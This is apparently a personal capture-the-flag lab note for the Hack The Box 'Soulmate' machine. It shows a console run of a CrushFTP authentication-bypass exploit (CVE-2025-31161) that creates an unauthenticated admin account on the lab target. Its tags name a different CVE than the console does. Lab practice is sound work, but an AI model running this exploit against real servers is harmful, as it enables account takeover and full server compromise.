---
created: "2025-11-02 22:35"
tags:
- CrushFTP
- CVE-2025-54309
- Authentication-Bypass
aliases:
- CVE-2025-54309
Type:
title:
updated: "2025-11-02 22:36"
---
```console
┌──(root㉿kali)-[~/Desktop/htb/Soulmate/CVE-2025-31161]
└─# python3 CVE-2025-31161.py --target_host ftp.soulmate.htb --port 80 --new_user admin --password Admin123
_____________ _______________ _______________ ________ .________ ________ ____ ____ ____________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ \_____ \/_ /_ |/ _____/_ |
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ _(__ < | || / __ \ | |
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \| || \ |__\ \| |
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ /|___||___|\_____ /|___|
\/ \/ \/ \/ \/ \/ \/ \/
Author: Gaurav Bhattacharjee (G4UR4V007)
CVE-2025-31161 - CrushFTP User Creation Authentication Bypass Exploit
Description:
This vulnerability allows an attacker to create a new user account on CrushFTP
without proper authentication by sending crafted XML payloads to the WebInterface.
This can lead to unauthorized access and potential full compromise of the server.
[+] Preparing Payloads
[-] Warming up the target...
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully!
[+] Exploit Complete! You can now login with:
[*] Username: admin
[*] Password: Admin123
```